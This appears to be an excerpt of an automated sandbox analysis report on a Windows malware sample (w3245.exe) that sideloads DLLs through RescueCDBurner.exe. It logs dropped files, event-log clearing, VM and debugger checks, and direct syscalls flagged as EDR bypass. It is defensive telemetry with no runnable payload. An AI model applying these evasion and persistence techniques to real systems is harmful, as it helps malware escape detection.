Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dllJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dllJump to dropped file
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeFile created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xbsvwJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lshbkgxootarJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,1_2_5BB43AA1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Hooking and other Techniques for Hiding and Protection

barindex
Found hidden mapped module (file has been removed from disk)
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\XBSVW
Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LSHBKGXOOTAR
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,1_2_5BB3DE09
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,2_2_6BDCA3DD

Malware Analysis System Evasion

barindex
Switches to a custom stack to bypass stack traces
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6CEC7C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6CEC7C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6CEC7945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6CEC3B54
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6B937C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeAPI/Special instruction interceptor: Address: 6B937945
Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6B933B54
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42F59
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeDropped PE file which has not been started: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dllJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xbsvwJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lshbkgxootarJump to dropped file
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeEvaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeEvasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeAPI coverage: 4.6 %
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe TID: 7084Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2288Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2708Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 007FFF61h0_2_007FFEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 007FFF5Ah0_2_007FFEC6
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00A3FF61h1_2_00A3FEC6
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00A3FF5Ah1_2_00A3FEC6
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_007C3CC4
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00804440 FindFirstFileW,FindClose,0_2_00804440
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_007D9B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A44440 FindFirstFileW,FindClose,1_2_00A44440
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00A19B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00A03CC4
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD981A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6BD981A1
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_6BDCC8FD
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDCCC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_6BDCCC23
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_008097A5 VirtualQuery,GetSystemInfo,0_2_008097A5
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: VMware
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000003.1694979185.000000000AC96000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2147091856.0000000000652000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
Source: RescueCDBurner.exe, 00000003.00000002.1777108025.000000006B89F000.00000008.00000001.01000000.00000015.sdmpBinary or memory string: jkd'tk.?AVQEmulationPaintEngine@@0/ k
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000002.00000002.1716542897.000000006C6AF000.00000008.00000001.01000000.0000000E.sdmpBinary or memory string: Kld'Ul.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000002.00000002.1716542897.000000006C6AF000.00000008.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000002.00000003.1694979185.000000000AC96000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777108025.000000006B89F000.00000008.00000001.01000000.00000015.sdmpBinary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\w3245.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EE88A
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F48D8 mov eax, dword ptr fs:[00000030h]0_2_007F48D8
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A348D8 mov eax, dword ptr fs:[00000030h]1_2_00A348D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007C394F GetProcessHeap,RtlAllocateHeap,0_2_007C394F
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007EE3D8
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EE88A
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007EE9DC SetUnhandledExceptionFilter,0_2_007EE9DC
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_007F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F3C76
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A2E3D8
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A2E88A
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A2E9DC SetUnhandledExceptionFilter,1_2_00A2E9DC
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exeCode function: 1_2_00A33C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A33C76
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BD807A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_6BD807A7
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exeCode function: 2_2_6BDFAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,2_2_6BDFAD2C

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x14011D93EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6693C7FFF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66920F709Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF66923F5AAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691B3D92Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692A3F0CJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF66924CB90Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF66925352FJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6693C800D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6692764A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtOpenKeyEx: Direct from: 0x7FF669275EECJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF669258418Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669329C73Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF6692CD833Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692A6D35Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BE314Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF66931A355Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF6692770E4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221C26A1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF66931A5ABJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669320A7DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtDelayExecution: Direct from: 0x7FF66933A57EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691D0D97Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF669315A4DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x14011D808Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669273116Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66926C79DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtCreateFile: Direct from: 0x7FF6693C3A6AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6693371E7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryInformationProcess: Direct from: 0x7FF669258A19Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF669373324Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66926BC49Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BE65DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateValueKey: Direct from: 0x7FF66930465DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66937449DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66925362EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6693C7FEB
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692EE0D3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BA692Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6693237A6Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669248E5DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtEnumerateKey: Direct from: 0x7FF6693C890FJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeNtQuerySystemInformation: Direct from: 0x76EF63E1Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtMapViewOfSection: Direct from: 0x7FF6693C696AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadFile: Direct from: 0x7FF66924CDCAJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF669276DE3Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtTerminateProcess: Direct from: 0x7FF6692575EDJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtQueryValueKey: Direct from: 0x7FF669277E48Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF6693C37DBJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF66931552DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669375120Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691C35D2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x7FF6693C5B8E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669258340Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtClose: Direct from: 0x14011D864
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FFE221E4B5EJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66932363DJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF66926BCC0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtSetInformationProcess: Direct from: 0x7FF669314AC4Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6691BACA7Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtReadVirtualMemory: Direct from: 0x7FF669315183Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeNtAllocateVirtualMemory: Direct from: 0x7FF6692A1072Jump to behavior
